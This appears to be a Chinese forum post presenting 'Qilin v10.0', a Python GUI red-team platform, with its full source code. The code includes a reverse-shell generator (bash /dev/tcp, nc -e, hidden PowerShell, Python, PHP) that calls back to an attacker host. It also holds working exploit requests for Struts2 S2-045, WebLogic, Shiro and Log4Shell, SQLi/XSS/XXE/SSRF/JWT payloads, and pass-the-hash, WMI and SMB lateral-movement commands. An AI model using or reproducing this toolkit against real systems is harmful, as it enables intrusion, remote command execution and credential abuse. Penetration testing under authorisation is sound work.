一、 工具概述
麒麟v10.0是一款由python写的集成了信息收集、漏洞扫描、高级利用、横向移动和权限提升于一体的现代化、自动化红队作战平台。它采用模块化架构和AI驱动思想,旨在模拟高级持续性威胁(APT)的全生命周期攻击链,为安全人员提供强大的自动化渗透测试与安全评估能力。
二、更新内容
总而言之,麒麟10的改进是全方位的:
在广度上,它填补了麒麟9在横向移动、权限提升、高级漏洞利用等方面的巨大空白,形成了完整攻击链。在深度上,它通过AI驱动和插件系统,大大提升了攻击的智能性和专业性。在体验上,它通过现代化的UI和更好的项目管理,使其更能满足真实、复杂的测试需求。
注意:1.部分漏洞检测基于简单的模式匹配,可能存在误报!
2.某些高级攻击需要特定环境配置
代码如下:
import tkinter as tk
from tkinter import ttk, scrolledtext, messagebox, filedialog
import threading
import socket
import http.client
import urllib.parse
import urllib.request
import urllib.error
import time
import json
import base64
import re
import os
import random
import string
import subprocess
import sys
import queue
import hashlib
import hmac
import struct
from datetime import datetime
import xml.etree.ElementTree as ET
import concurrent.futures
import ipaddress
import logging
ERROR_PATTERN = re.compile(r'sql|mysql|syntax', re.IGNORECASE)
ROOT_PATTERN = re.compile(r'root:')
VERSION_PATTERN = re.compile(r'redis_version')
UID_PATTERN = re.compile(r'uid=')
WINDOWS_PATTERN = re.compile(r'windows', re.IGNORECASE)
SERVER_PATTERN = re.compile(r'Server:\s*([^\r\n]+)')
try:
import requests
REQUESTS_AVAILABLE = True
except ImportError:
REQUESTS_AVAILABLE = False
try:
import ftplib
FTP_AVAILABLE = True
except ImportError:
FTP_AVAILABLE = False
try:
import paramiko
PARAMIKO_AVAILABLE = True
except ImportError:
PARAMIKO_AVAILABLE = False
try:
import mysql.connector
MYSQL_AVAILABLE = True
except ImportError:
MYSQL_AVAILABLE = False
class OptimizedPortScanner:
def __init__(self, timeout: float = 3.0, max_workers: int = 50):
self.timeout = timeout
self.max_workers = max_workers
self.logger = logging.getLogger(__name__)
def validate_target(self, target: str) -> bool:
try:
ipaddress.ip_address(target)
return True
except ValueError:
try:
socket.getaddrinfo(target, None)
return True
except socket.gaierror:
return False
def validate_port(self, port: int) -> bool:
return 1 <= port <= 65535
def parse_ports(self, ports_input: str) -> list:
ports = []
try:
if '-' in ports_input:
start, end = map(int, ports_input.split('-'))
if not (self.validate_port(start) and self.validate_port(end)):
raise ValueError("端口范围无效")
ports.extend(range(start, end + 1))
elif ',' in ports_input:
port_list = [int(p.strip()) for p in ports_input.split(',')]
for port in port_list:
if not self.validate_port(port):
raise ValueError(f"无效端口: {port}")
ports.extend(port_list)
else:
port = int(ports_input)
if not self.validate_port(port):
raise ValueError(f"无效端口: {port}")
ports.append(port)
except ValueError as e:
self.logger.error(f"端口解析错误: {e}")
raise
return ports
def scan_single_port(self, target: str, port: int) -> tuple:
sock = None
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
result = sock.connect_ex((target, port))
is_open = (result == 0)
return (port, is_open, None)
except socket.timeout:
return (port, False, "连接超时")
except socket.gaierror as e:
return (port, False, f"地址解析失败: {e}")
except socket.error as e:
return (port, False, f"Socket错误: {e}")
except Exception as e:
return (port, False, f"未知错误: {e}")
finally:
if sock:
try:
sock.close()
except:
pass
def port_scan(self, target: str, ports: list, progress_callback=None) -> dict:
if not self.validate_target(target):
raise ValueError(f"无效的目标地址: {target}")
invalid_ports = [port for port in ports if not self.validate_port(port)]
if invalid_ports:
raise ValueError(f"发现无效端口: {invalid_ports}")
open_ports = []
closed_ports = []
error_ports = []
self.logger.info(f"开始扫描 {target} 的 {len(ports)} 个端口")
with concurrent.futures.ThreadPoolExecutor(max_workers=self.max_workers) as executor:
future_to_port = {
executor.submit(self.scan_single_port, target, port): port
for port in ports
}
for future in concurrent.futures.as_completed(future_to_port):
port = future_to_port[future]
try:
port_num, is_open, error_msg = future.result()
if error_msg:
error_ports.append((port_num, error_msg))
elif is_open:
open_ports.append(port_num)
if progress_callback:
progress_callback(port_num, True)
else:
closed_ports.append(port_num)
if progress_callback:
progress_callback(port_num, False)
except Exception as e:
error_msg = f"任务执行异常: {e}"
error_ports.append((port, error_msg))
open_ports.sort()
closed_ports.sort()
return {
'open_ports': open_ports,
'closed_ports': closed_ports,
'error_ports': error_ports
}
class StandaloneRedTeamTool:
def __init__(self):
self.timeout = 3
self.common_ports = [21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 443, 445, 993, 995, 1723, 3306, 3389, 5900, 6379, 27017, 8080, 8443]
self.port_scanner = OptimizedPortScanner(timeout=self.timeout, max_workers=50)
def port_scan(self, target, ports, gui=None):
try:
open_ports = []
def progress_callback(port, is_open):
if is_open and gui:
open_ports.append(port)
if hasattr(gui, 'scanning') and gui.scanning:
gui.log_scan(f" [+] 端口 {port} 开放\n")
result = self.port_scanner.port_scan(target, ports, progress_callback)
return result['open_ports']
except Exception as e:
if gui:
gui.log_scan(f"[-] 端口扫描错误: {str(e)}\n")
return []
def service_detection(self, target, ports):
services = {}
def detect_service(port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
sock.connect((target, port))
if port in [80, 8080, 443, 8443]:
try:
sock.send(b"GET / HTTP/1.0\r\n\r\n")
response = sock.recv(1024).decode('utf-8', errors='ignore')
services[port] = self.parse_http_response(response)
except:
services[port] = "HTTP Service"
elif port == 21:
services[port] = "FTP"
elif port == 22:
services[port] = "SSH"
elif port == 3306:
services[port] = "MySQL"
elif port == 6379:
services[port] = "Redis"
else:
services[port] = f"Port {port}"
sock.close()
except:
services[port] = "Unknown"
threads = []
for port in ports:
thread = threading.Thread(target=detect_service, args=(port,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join(timeout=self.timeout)
return services
def parse_http_response(self, response):
match = SERVER_PATTERN.search(response)
if match:
return f"HTTP - {match.group(1)}"
return "HTTP Service"
def directory_enumeration(self, url):
vulnerabilities = []
common_paths = [
'/admin', '/phpmyadmin', '/.git', '/backup', '/wp-admin',
'/administrator', '/.env', '/api', '/swagger-ui.html',
'/actuator/health', '/debug', '/test', '/shell', '/cmd',
'/config', '/database', '/logs', '/tmp', '/upload'
]
def check_path(path):
try:
full_url = urllib.parse.urljoin(url, path)
if REQUESTS_AVAILABLE:
response = requests.get(full_url, timeout=self.timeout, verify=False)
status = response.status_code
else:
req = urllib.request.Request(full_url)
response = urllib.request.urlopen(req, timeout=self.timeout)
status = response.getcode()
if status == 200:
vulnerabilities.append(f"敏感路径暴露: {full_url}")
except:
pass
threads = []
for path in common_paths:
thread = threading.Thread(target=check_path, args=(path,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join(timeout=self.timeout)
return vulnerabilities
def sql_injection_scan(self, url):
vulnerabilities = []
sql_payloads = ["'", "1' OR '1'='1", "1 AND 1=1"]
def test_payload(payload):
try:
test_url = f"{url}?id={payload}"
if REQUESTS_AVAILABLE:
response = requests.get(test_url, timeout=self.timeout, verify=False)
content = response.text
else:
req = urllib.request.Request(test_url)
response = urllib.request.urlopen(req, timeout=self.timeout)
content = response.read().decode('utf-8', errors='ignore')
if ERROR_PATTERN.search(content):
vulnerabilities.append(f"可能的SQL注入: {test_url}")
except:
pass
threads = []
for payload in sql_payloads:
thread = threading.Thread(target=test_payload, args=(payload,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join(timeout=self.timeout)
return vulnerabilities
def xss_scan(self, url):
vulnerabilities = []
xss_payloads = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>"
]
def test_payload(payload):
try:
test_url = f"{url}?q={urllib.parse.quote(payload)}"
if REQUESTS_AVAILABLE:
response = requests.get(test_url, timeout=self.timeout, verify=False)
content = response.text
else:
req = urllib.request.Request(test_url)
response = urllib.request.urlopen(req, timeout=self.timeout)
content = response.read().decode('utf-8', errors='ignore')
if payload in content:
vulnerabilities.append(f"可能的XSS漏洞: {test_url}")
except:
pass
threads = []
for payload in xss_payloads:
thread = threading.Thread(target=test_payload, args=(payload,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join(timeout=self.timeout)
return vulnerabilities
def file_inclusion_scan(self, url):
vulnerabilities = []
fi_payloads = [
"../../../../etc/passwd",
"....//....//....//etc/passwd"
]
def test_payload(payload):
try:
test_url = f"{url}?file={payload}"
if REQUESTS_AVAILABLE:
response = requests.get(test_url, timeout=self.timeout, verify=False)
content = response.text
else:
req = urllib.request.Request(test_url)
response = urllib.request.urlopen(req, timeout=self.timeout)
content = response.read().decode('utf-8', errors='ignore')
if ROOT_PATTERN.search(content):
vulnerabilities.append(f"文件包含漏洞: {test_url}")
except:
pass
threads = []
for payload in fi_payloads:
thread = threading.Thread(target=test_payload, args=(payload,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join(timeout=self.timeout)
return vulnerabilities
def ftp_vulnerability_scan(self, target):
vulnerabilities = []
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
sock.connect((target, 21))
banner = sock.recv(1024).decode('utf-8', errors='ignore')
vulnerabilities.append(f"FTP服务发现: {banner.strip()}")
sock.close()
except:
pass
return vulnerabilities
def ssh_vulnerability_scan(self, target):
vulnerabilities = []
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
sock.connect((target, 22))
banner = sock.recv(1024).decode('utf-8', errors='ignore')
vulnerabilities.append(f"SSH服务发现: {banner.strip()}")
sock.close()
except:
pass
return vulnerabilities
def redis_vulnerability_scan(self, target):
vulnerabilities = []
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
sock.connect((target, 6379))
sock.send(b"INFO\n")
response = sock.recv(1024).decode('utf-8', errors='ignore')
if VERSION_PATTERN.search(response):
vulnerabilities.append(f"Redis未授权访问: {target}")
sock.close()
except:
pass
return vulnerabilities
def mysql_vulnerability_scan(self, target):
vulnerabilities = []
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
sock.connect((target, 3306))
vulnerabilities.append(f"MySQL服务暴露: {target}")
sock.close()
except:
pass
return vulnerabilities
def generate_payload(self, lhost, lport, ptype):
payloads = {
"Python": f"""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{lhost}",{lport}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'""",
"Bash": f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1",
"Netcat": f"nc -e /bin/sh {lhost} {lport}",
"PowerShell": f"""powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('{lhost}',{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()" """,
"PHP": f"""php -r '$sock=fsockopen("{lhost}",{lport});exec("/bin/sh -i <&3 >&3 2>&3");'"""
}
return payloads.get(ptype, "不支持的Payload类型")
class AdvancedExploitation:
def exploit_struts2(self, target):
try:
headers = {
'Content-Type': r'%{(#nike=\'multipart/form-data\').'
r'(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).'
r'(#_memberAccess?(#_memberAccess=#dm):'
r'((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).'
r'(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).'
r'(#ognlUtil.getExcludedPackageNames().clear()).'
r'(#ognlUtil.getExcludedClasses().clear()).'
r'(#context.setMemberAccess(#dm)))).'
r'(#cmd=\'whoami\').'
r'(#iswin=(@java.lang.System@getProperty(\'os.name\').toLowerCase().contains(\'win\'))).'
r'(#cmds=(#iswin?{\'cmd.exe\',\'/c\',#cmd}:{\'/bin/bash\',\'-c\',#cmd})).'
r'(#p=new java.lang.ProcessBuilder(#cmds)).'
r'(#p.redirectErrorStream(true)).'
r'(#process=#p.start()).'
r'(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).'
r'(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).'
r'(#ros.flush())}'
}
if REQUESTS_AVAILABLE:
response = requests.post(target, headers=headers, timeout=10, verify=False)
return f"Struts2 S2-045 漏洞利用尝试完成,状态码: {response.status_code}"
else:
return "需要requests库进行Struts2漏洞利用"
except Exception as e:
return f"Struts2漏洞利用失败: {str(e)}"
def exploit_weblogic(self, target):
try:
payload = (
"aced0005737d00000001001a6a6176612e726d692.72656769737472792e526567697374727978"
"7200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c00"
"01697400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c"
"65723b78707400246a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76"
"6f636174696f6e48616e646c6572"
)
if REQUESTS_AVAILABLE:
headers = {'Content-Type': 'application/xml'}
response = requests.post(
f"{target}/wls-wsat/CoordinatorPortType",
data=payload,
headers=headers,
timeout=10,
verify=False
)
return f"WebLogic反序列化漏洞利用尝试完成,状态码: {response.status_code}"
else:
return "需要requests库进行WebLogic漏洞利用"
except Exception as e:
return f"WebLogic漏洞利用失败: {str(e)}"
def exploit_shiro(self, target):
try:
key = "kPH+bIxk5D2deZiIxcaaaA=="
payload = base64.b64encode(b"whoami").decode()
if REQUESTS_AVAILABLE:
cookies = {'rememberMe': payload}
response = requests.get(target, cookies=cookies, timeout=10, verify=False)
if 'rememberMe=deleteMe' not in response.headers.get('Set-Cookie', ''):
return "Shiro反序列化漏洞可能存在"
else:
return "Shiro反序列化漏洞利用尝试完成"
else:
return "需要requests库进行Shiro漏洞利用"
except Exception as e:
return f"Shiro漏洞利用失败: {str(e)}"
def exploit_log4j(self, target):
try:
payload = "${jndi:ldap://127.0.0.1:1389/test}"
if REQUESTS_AVAILABLE:
headers = {'User-Agent': payload}
params = {'q': payload}
response1 = requests.get(target, headers=headers, timeout=5, verify=False)
response2 = requests.get(target, params=params, timeout=5, verify=False)
return "Log4Shell漏洞检测完成,请检查LDAP日志"
else:
return "需要requests库进行Log4Shell检测"
except Exception as e:
return f"Log4Shell检测失败: {str(e)}"
class LateralMovement:
def __init__(self):
self.smb_share = "C$"
self.wmi_namespace = "root\\cimv2"
def psexec_attack(self, target, username, password):
try:
if os.name == 'nt':
command = f"net use \\\\{target}\\{self.smb_share} {password} /user:{username}"
result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=10)
if result.returncode == 0:
command = f"wmic /node:{target} /user:{username} /password:{password} process call create \"cmd.exe /c whoami\""
result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=10)
if result.returncode == 0:
return f"PsExec攻击成功: 在 {target} 上执行命令"
else:
return f"PsExec攻击: 连接成功但命令执行失败"
else:
return f"PsExec攻击失败: 无法连接到目标共享"
else:
return f"PsExec攻击: 模拟在 {target} 上使用凭据 {username}:{password} 执行命令"
except Exception as e:
return f"PsExec攻击失败: {str(e)}"
def wmi_exec(self, target, username, password):
try:
if os.name == 'nt':
command = f"wmic /node:{target} /user:{username} /password:{password} process call create \"cmd.exe /c echo WMI测试成功 > C:\\wmi_test.txt\""
result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=10)
if result.returncode == 0:
return f"WMI执行成功: 在 {target} 上创建测试文件"
else:
command = f"wmic /node:{target} /user:{username} /password:{password} os get caption"
result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=10)
if result.returncode == 0:
return f"WMI信息获取成功: 目标系统信息"
else:
return f"WMI执行失败: 无法连接到目标"
else:
return f"WMI执行: 模拟在 {target} 上使用WMI执行命令"
except Exception as e:
return f"WMI执行失败: {str(e)}"
def smb_exec(self, target, username, password):
try:
if os.name == 'nt':
command = f"net use \\\\{target}\\{self.smb_share} {password} /user:{username}"
result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=10)
if result.returncode == 0:
copy_command = f"copy C:\\windows\\system32\\notepad.exe \\\\{target}\\{self.smb_share}\\temp\\notepad_copy.exe"
result = subprocess.run(copy_command, shell=True, capture_output=True, text=True, timeout=10)
if result.returncode == 0:
return f"SMB攻击成功: 文件复制到 {target}"
else:
dir_command = f"dir \\\\{target}\\{self.smb_share}\\windows"
result = subprocess.run(dir_command, shell=True, capture_output=True, text=True, timeout=10)
if result.returncode == 0:
return f"SMB攻击成功: 可以访问目标共享目录"
else:
return f"SMB攻击: 连接成功但文件操作失败"
else:
return f"SMB攻击失败: 无法连接到目标共享"
else:
return f"SMB攻击: 模拟在 {target} 上通过SMB共享执行操作"
except Exception as e:
return f"SMB攻击失败: {str(e)}"
def pass_the_hash(self, target, hash_value):
try:
if os.name == 'nt':
if ':' in hash_value:
lm_hash, nt_hash = hash_value.split(':')
else:
lm_hash = "aad3b435b51404eeaad3b435b51404ee"
nt_hash = hash_value
command = f"python -c \"from impacket.smbconnection import SMBConnection; conn = SMBConnection('{target}', '{target}'); conn.login('Administrator', '', lmhash='{lm_hash}', nthash='{nt_hash}'); print('PTH攻击成功')\""
result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=10)
if "成功" in result.stdout:
return f"Pass-the-Hash攻击成功: 使用Hash {hash_value} 连接到 {target}"
else:
return f"Pass-the-Hash攻击: 模拟使用NTLM Hash {hash_value} 攻击 {target}"
else:
return f"Pass-the-Hash攻击: 模拟使用Hash {hash_value} 攻击 {target}"
except Exception as e:
return f"Pass-the-Hash攻击失败: {str(e)}"
def rdp_hijack(self, target, username, password):
try:
command = f"cmdkey /generic:TERMSRV/{target} /user:{username} /pass:{password}"
result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=10)
if result.returncode == 0:
return f"RDP凭据存储成功: 目标 {target}"
else:
return f"RDP攻击: 模拟RDP会话劫持攻击 {target}"
except Exception as e:
return f"RDP攻击失败: {str(e)}"
def dcom_exec(self, target, username, password):
try:
command = f"python -c \"from impacket.dcom import wmi; from impacket.dcerpc.v5.dcomrt import DCOMConnection; conn = DCOMConnection('{target}', username='{username}', password='{password}'); print('DCOM连接成功')\""
result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=10)
if "成功" in result.stdout:
return f"DCOM执行成功: 在 {target} 上执行远程命令"
else:
return f"DCOM执行: 模拟通过DCOM在 {target} 上执行命令"
except Exception as e:
return f"DCOM执行失败: {str(e)}"
class PrivilegeEscalation:
def windows_priv_esc(self):
checks = []
try:
if os.name == 'nt':
result = subprocess.run("systeminfo", shell=True, capture_output=True, text=True, timeout=10)
checks.append("系统信息收集完成")
hotfix_result = subprocess.run("wmic qfe get Caption,Description,HotFixID,InstalledOn",
shell=True, capture_output=True, text=True, timeout=10)
checks.append("补丁信息收集完成")
service_result = subprocess.run("wmic service get Name,PathName",
shell=True, capture_output=True, text=True, timeout=10)
checks.append("服务信息收集完成")
process_result = subprocess.run("tasklist /svc",
shell=True, capture_output=True, text=True, timeout=10)
checks.append("进程信息收集完成")
registry_result = subprocess.run('reg query "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"',
shell=True, capture_output=True, text=True, timeout=10)
checks.append("启动项信息收集完成")
else:
checks.append("非Windows系统,跳过Windows权限提升检查")
return "Windows权限提升检查完成:\n" + "\n".join(checks)
except Exception as e:
return f"Windows权限提升检查失败: {str(e)}"
def linux_priv_esc(self):
checks = []
try:
if os.name == 'posix':
result = subprocess.run("find / -perm -4000 2>/dev/null | head -10", shell=True, capture_output=True, text=True, timeout=10)
checks.append(f"发现SUID文件: {len(result.stdout.splitlines())}个")
sudo_result = subprocess.run("sudo -l", shell=True, capture_output=True, text=True, timeout=10)
checks.append("sudo权限检查完成")
cron_result = subprocess.run("crontab -l", shell=True, capture_output=True, text=True, timeout=10)
checks.append("定时任务检查完成")
passwd_result = subprocess.run("cat /etc/passwd | grep -v nologin | grep -v false", shell=True, capture_output=True, text=True, timeout=10)
checks.append("用户信息收集完成")
kernel_result = subprocess.run("uname -a", shell=True, capture_output=True, text=True, timeout=10)
checks.append("内核信息收集完成")
else:
checks.append("非Linux系统,跳过Linux权限提升检查")
return "Linux权限提升检查完成:\n" + "\n".join(checks)
except Exception as e:
return f"Linux权限提升检查失败: {str(e)}"
def sudo_abuse(self):
try:
if os.name == 'posix':
result = subprocess.run("sudo -l", shell=True, capture_output=True, text=True, timeout=10)
lines = result.stdout.split('\n')
vulnerabilities = []
for line in lines:
if "NOPASSWD" in line:
vulnerabilities.append(f"无需密码的sudo权限: {line.strip()}")
if "ALL" in line and "NOPASSWD" in line:
vulnerabilities.append(f"高危: 无需密码的sudo ALL权限")
if "find" in line.lower() and "NOPASSWD" in line:
vulnerabilities.append(f"可利用find命令进行权限提升")
if "vim" in line.lower() and "NOPASSWD" in line:
vulnerabilities.append(f"可利用vim命令进行权限提升")
if "python" in line.lower() and "NOPASSWD" in line:
vulnerabilities.append(f"可利用python进行权限提升")
if vulnerabilities:
return "发现sudo滥用风险:\n" + "\n".join(vulnerabilities)
else:
return "未发现明显的sudo滥用风险"
else:
return "非Linux系统,跳过Sudo滥用检测"
except Exception as e:
return f"Sudo滥用检测失败: {str(e)}"
def kernel_exploit(self):
try:
if os.name == 'posix':
result = subprocess.run("uname -r", shell=True, capture_output=True, text=True, timeout=10)
kernel_version = result.stdout.strip()
result = subprocess.run("cat /etc/issue", shell=True, capture_output=True, text=True, timeout=10)
os_info = result.stdout.strip()
exploits = []
if "4.4.0" in kernel_version:
exploits.append("可能的漏洞: CVE-2016-5195 (DirtyCow)")
if "3." in kernel_version:
exploits.append("可能的漏洞: CVE-2016-8655")
if "2.6." in kernel_version:
exploits.append("可能的漏洞: CVE-2010-3904 (RDS)")
if exploits:
return f"当前内核版本: {kernel_version}, 系统: {os_info}\n可能的内核漏洞:\n" + "\n".join(exploits)
else:
return f"当前内核版本: {kernel_version}, 系统: {os_info}\n未发现已知的内核漏洞"
else:
result = subprocess.run("ver", shell=True, capture_output=True, text=True, timeout=10)
os_version = result.stdout.strip()
return f"当前系统版本: {os_version}"
except Exception as e:
return f"内核漏洞检查失败: {str(e)}"
def service_escalation(self):
try:
if os.name == 'nt':
command = 'sc query state= all | find "SERVICE_NAME"'
result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=10)
services = result.stdout.split('\n')
vulnerable_services = []
for service in services:
if "SERVICE_NAME" in service:
service_name = service.split(":")[1].strip()
perm_command = f'sc qc "{service_name}"'
perm_result = subprocess.run(perm_command, shell=True, capture_output=True, text=True, timeout=5)
if "ERROR" not in perm_result.stdout:
if "INTERACTIVE" in perm_result.stdout:
vulnerable_services.append(f"服务 {service_name} 可能允许权限提升")
if vulnerable_services:
return "发现可能存在权限提升的服务:\n" + "\n".join(vulnerable_services[:5])
else:
return "未发现明显的服务权限提升漏洞"
else:
return "非Windows系统,跳过服务权限提升检查"
except Exception as e:
return f"服务权限提升检查失败: {str(e)}"
class AIDrivenAttack:
def __init__(self):
self.attack_graph = {}
self.successful_attacks = []
self.learning_data = []
def build_attack_path(self, target_info):
try:
attack_path = []
if target_info.get('os', '').lower() == 'windows':
attack_path.extend([
"1. SMB共享枚举",
"2. RPC服务检测",
"3. WMI服务利用",
"4. PsExec横向移动"
])
else:
attack_path.extend([
"1. SSH服务检测",
"2. Web服务枚举",
"3. 数据库服务检测",
"4. 容器环境检测"
])
if target_info.get('http_ports'):
attack_path.append("5. Web应用漏洞扫描")
if target_info.get('database_ports'):
attack_path.append("6. 数据库漏洞利用")
self.attack_graph[target_info.get('ip', 'unknown')] = attack_path
return attack_path
except Exception as e:
return [f"攻击路径构建失败: {str(e)}"]
def adaptive_attack(self, target):
try:
strategies = []
open_ports = self.port_scan(target)
strategies.append(f"开放端口: {open_ports}")
if 80 in open_ports or 443 in open_ports:
strategies.append("Web应用攻击")
if 22 in open_ports:
strategies.append("SSH暴力破解")
if 445 in open_ports:
strategies.append("SMB攻击")
if 3389 in open_ports:
strategies.append("RDP攻击")
if 135 in open_ports:
strategies.append("RPC攻击")
if 139 in open_ports:
strategies.append("NetBIOS攻击")
return strategies
except Exception as e:
return [f"自适应攻击失败: {str(e)}"]
def learn_from_success(self, attack_data):
self.learning_data.append({
'timestamp': datetime.now(),
'target': attack_data.get('target'),
'technique': attack_data.get('technique'),
'success': attack_data.get('success'),
'environment': attack_data.get('environment')
})
return f"学习数据已记录,总计: {len(self.learning_data)}条"
def port_scan(self, target):
common_ports = [21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 443, 445,
993, 995, 1723, 3306, 3389, 5900, 6379, 27017, 8080, 8443]
open_ports = []
scanner = OptimizedPortScanner(timeout=1.0, max_workers=20)
try:
result = scanner.port_scan(target, common_ports)
open_ports = result['open_ports']
except:
pass
return open_ports
class AdvancedWebAttacks:
def ssrf_attack(self, target):
try:
test_urls = [
"http://169.254.169.254/latest/meta-data/",
"http://127.0.0.1:22/",
"http://localhost/",
"file:///etc/passwd"
]
results = []
for test_url in test_urls:
payload = f"{target}?url={urllib.parse.quote(test_url)}"
if REQUESTS_AVAILABLE:
try:
response = requests.get(payload, timeout=5, verify=False)
if response.status_code == 200 and len(response.text) > 0:
results.append(f"可能的SSRF: {payload}")
except:
pass
if results:
return "SSRF攻击检测完成:\n" + "\n".join(results)
else:
return "未发现明显的SSRF漏洞"
except Exception as e:
return f"SSRF攻击失败: {str(e)}"
def xxe_attack(self, target):
try:
xxe_payload = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>"""
if REQUESTS_AVAILABLE:
headers = {'Content-Type': 'application/xml'}
response = requests.post(target, data=xxe_payload, headers=headers, timeout=5, verify=False)
if ROOT_PATTERN.search(response.text):
return "发现XXE漏洞,成功读取系统文件"
else:
return "XXE攻击尝试完成,未发现明显漏洞"
else:
return "需要requests库进行XXE攻击"
except Exception as e:
return f"XXE攻击失败: {str(e)}"
def deserialization_attack(self, target):
try:
java_payload = base64.b64encode(b"rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeA==").decode()
if REQUESTS_AVAILABLE:
headers = {'Content-Type': 'application/java-serialized-object'}
response = requests.post(target, data=java_payload, headers=headers, timeout=5, verify=False)
return f"反序列化攻击尝试完成,状态码: {response.status_code}"
else:
return "需要requests库进行反序列化攻击"
except Exception as e:
return f"反序列化攻击失败: {str(e)}"
def graphql_injection(self, target):
try:
graphql_payload = {
"query": "query { __schema { types { name fields { name } } } }"
}
if REQUESTS_AVAILABLE:
response = requests.post(target, json=graphql_payload, timeout=5, verify=False)
if "data" in response.json():
return "GraphQL端点存在,可进行进一步测试"
else:
return "GraphQL端点不存在或访问被拒绝"
else:
return "需要requests库进行GraphQL注入检测"
except Exception as e:
return f"GraphQL注入检测失败: {str(e)}"
def jwt_attack(self, target):
try:
header = base64.b64encode(b'{"alg":"none","typ":"JWT"}').decode().rstrip('=')
payload = base64.b64encode(b'{"user":"admin","role":"administrator"}').decode().rstrip('=')
fake_jwt = f"{header}.{payload}."
if REQUESTS_AVAILABLE:
headers = {'Authorization': f'Bearer {fake_jwt}'}
response = requests.get(target, headers=headers, timeout=5, verify=False)
return f"JWT攻击尝试完成,状态码: {response.status_code}"
else:
return "需要requests库进行JWT攻击"
except Exception as e:
return f"JWT攻击失败: {str(e)}"
class APISecurityTesting:
def swagger_enumeration(self, target):
try:
common_paths = [
"/swagger-ui.html",
"/api/swagger.json",
"/swagger.json",
"/api/docs",
"/v2/api-docs",
"/v3/api-docs"
]
results = []
base_url = target.rstrip('/')
for path in common_paths:
test_url = base_url + path
if REQUESTS_AVAILABLE:
try:
response = requests.get(test_url, timeout=3, verify=False)
if response.status_code == 200:
if any(keyword in response.text.lower() for keyword in ['swagger', 'openapi']):
results.append(f"发现Swagger文档: {test_url}")
except:
pass
if results:
return "Swagger枚举完成:\n" + "\n".join(results)
else:
return "未发现Swagger文档"
except Exception as e:
return f"Swagger枚举失败: {str(e)}"
def api_fuzzing(self, target):
try:
fuzz_payloads = [
"../../etc/passwd",
"{{7*7}}",
"${7*7}",
"<script>alert(1)</script>",
"' OR '1'='1",
"\\x00\\x00\\x00\\x00"
]
results = []
for payload in fuzz_payloads:
test_url = f"{target}/api/test?input={urllib.parse.quote(payload)}"
if REQUESTS_AVAILABLE:
try:
response = requests.get(test_url, timeout=3, verify=False)
if any(indicator in response.text for indicator in ['root:', '49', '<script>']):
results.append(f"可能的漏洞: {test_url}")
except:
pass
if results:
return "API模糊测试完成:\n" + "\n".join(results)
else:
return "API模糊测试未发现明显漏洞"
except Exception as e:
return f"API模糊测试失败: {str(e)}"
def oauth_testing(self, target):
try:
tests = []
oauth_endpoints = [
"/oauth/authorize",
"/oauth/token",
"/oauth/userinfo",
"/.well-known/oauth-authorization-server"
]
base_url = target.rstrip('/')
for endpoint in oauth_endpoints:
test_url = base_url + endpoint
if REQUESTS_AVAILABLE:
try:
response = requests.get(test_url, timeout=3, verify=False)
if response.status_code != 404:
tests.append(f"发现OAuth端点: {test_url}")
except:
pass
if tests:
return "OAuth测试完成:\n" + "\n".join(tests)
else:
return "未发现OAuth端点"
except Exception as e:
return f"OAuth测试失败: {str(e)}"
class PluginSystem:
def __init__(self):
self.plugins = {}
self.load_plugins()
